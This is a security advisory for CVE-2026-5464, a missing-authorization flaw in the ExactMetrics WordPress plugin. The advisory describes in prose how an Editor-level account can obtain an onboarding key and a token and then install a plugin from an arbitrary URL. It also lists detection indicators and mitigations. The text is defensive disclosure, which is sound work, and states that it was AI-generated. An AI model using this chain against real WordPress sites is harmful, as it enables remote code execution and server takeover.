CVE-2026-5464 Overview
The ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) plugin for WordPress contains a critical authorization bypass vulnerability that allows authenticated attackers to install and activate arbitrary plugins from attacker-controlled URLs. This vulnerability affects all versions up to and including 9.1.2 and can lead to Remote Code Execution (RCE) on affected WordPress installations.
The vulnerability stems from a flawed authentication chain where the reports page exposes the onboarding_key transient to users with the exactmetrics_view_dashboard capability. This key is used as the sole authorization gate for a REST endpoint that returns a one-time hash (OTH) token, which subsequently allows arbitrary plugin installation without proper capability checks or nonce verification.
Critical Impact
Authenticated attackers with Editor-level access or above who have report viewing permissions can install and activate malicious plugins from external URLs, achieving full Remote Code Execution on the WordPress server.
Affected Products
- ExactMetrics – Google Analytics Dashboard for WordPress (Website Stats Plugin) versions up to and including 9.1.2
- WordPress installations with the vulnerable plugin installed
- Any WordPress site where Editors or higher-privileged users have been granted report viewing permissions
Discovery Timeline
- April 23, 2026 - CVE-2026-5464 published to NVD
- April 23, 2026 - Last updated in NVD database
Technical Details for CVE-2026-5464
Vulnerability Analysis
This vulnerability represents a classic case of broken access control (CWE-862) where multiple authorization weaknesses combine to create a severe security issue. The attack chain exploits the plugin's onboarding process, which was designed to simplify plugin activation but inadvertently created a pathway for malicious plugin installation.
The attack requires network access and authentication with at least Editor-level privileges combined with the exactmetrics_view_dashboard capability. Once these prerequisites are met, the attacker can leverage the exposed onboarding_key to obtain an OTH token, which then serves as the sole credential for the exactmetrics_connect_process AJAX endpoint.
The impact is severe because this endpoint accepts an arbitrary plugin ZIP URL via the file parameter, allowing attackers to install and activate any code they control on the WordPress server.
Root Cause
The root cause of this vulnerability is the Missing Authorization (CWE-862) in the plugin installation workflow. Specifically, the exactmetrics_connect_process AJAX endpoint lacks:
- Capability checks - No verification that the requesting user has permission to install plugins
- Nonce verification - No CSRF protection to prevent request forgery
- URL validation - Accepts arbitrary external ZIP URLs for plugin installation
The onboarding_key transient is exposed to users who only need dashboard viewing capabilities, but this key unlocks functionality that should require administrator privileges. This violation of the principle of least privilege creates the authorization bypass.
Attack Vector
The attack is conducted over the network and follows a multi-step exploitation chain. An attacker must first authenticate to WordPress with at least Editor-level access and the exactmetrics_view_dashboard capability. From the reports page, the attacker extracts the exposed onboarding_key transient value.
Using this key, the attacker makes a request to the /wp-json/exactmetrics/v1/onboarding/connect-url REST endpoint to obtain a one-time hash (OTH) token. Finally, the attacker calls the exactmetrics_connect_process AJAX endpoint with the OTH token and a file parameter pointing to a malicious plugin ZIP hosted on an attacker-controlled server. The vulnerable endpoint downloads, installs, and activates the malicious plugin, granting the attacker code execution on the server.
For detailed technical analysis of the vulnerable code paths, see the WordPress Plugin Code Snippet, Onboarding Code, and Connect File Code.
Detection Methods for CVE-2026-5464
Indicators of Compromise
- Unexpected AJAX requests to exactmetrics_connect_process action from non-administrator users
- HTTP requests to /wp-json/exactmetrics/v1/onboarding/connect-url from Editor-level accounts
- Newly installed plugins not recognized by administrators, particularly those from external URLs
- Outbound connections from the WordPress server to unknown external hosts downloading ZIP files
Detection Strategies
- Monitor WordPress AJAX logs for exactmetrics_connect_process calls, especially those containing file parameters with external URLs
- Implement file integrity monitoring on the wp-content/plugins/ directory to detect unauthorized plugin installations
- Review WordPress activity logs for plugin activation events not initiated by administrators
- Configure web application firewalls to alert on requests to the vulnerable REST endpoints from users without plugin installation capabilities
Monitoring Recommendations
- Enable verbose logging for the ExactMetrics plugin and WordPress REST API endpoints
- Implement real-time alerts for any plugin installation or activation events
- Monitor for network connections to unusual external domains from the web server
- Review user capability assignments to identify Editor-level users with exactmetrics_view_dashboard permissions
How to Mitigate CVE-2026-5464
Immediate Actions Required
- Update the ExactMetrics plugin to a version newer than 9.1.2 as soon as a patched version is available
- Audit all installed WordPress plugins for unexpected or unrecognized additions
- Review and restrict which users have the exactmetrics_view_dashboard capability
- Temporarily disable the ExactMetrics plugin if an update is not yet available and the risk is unacceptable
Patch Information
Organizations using the ExactMetrics – Google Analytics Dashboard for WordPress plugin should monitor for an official security update from the plugin developers. The vulnerability affects versions up to and including 9.1.2. Check the official WordPress plugin repository and the Wordfence Vulnerability Analysis for the latest patch information and security advisories.
Workarounds
- Remove the exactmetrics_view_dashboard capability from all non-administrator users until a patch is applied
- Implement a web application firewall (WAF) rule to block requests to the /wp-json/exactmetrics/v1/onboarding/connect-url endpoint
- Restrict AJAX access to the exactmetrics_connect_process action using server-side access controls
- Consider temporarily deactivating the ExactMetrics plugin in high-risk environments
# WordPress capability restriction example
# Add to your theme's functions.php or a custom plugin
# Remove exactmetrics_view_dashboard capability from editors
# This should be implemented via wp-cli or custom code:
wp cap remove editor exactmetrics_view_dashboard
# Alternatively, use .htaccess to block the vulnerable endpoint:
# Add to WordPress .htaccess file
# <IfModule mod_rewrite.c>
# RewriteEngine On
# RewriteRule ^wp-json/exactmetrics/v1/onboarding/connect-url - [F,L]
# </IfModule>
Disclaimer: This content was generated using AI. While we strive for accuracy, please verify critical information with official sources.
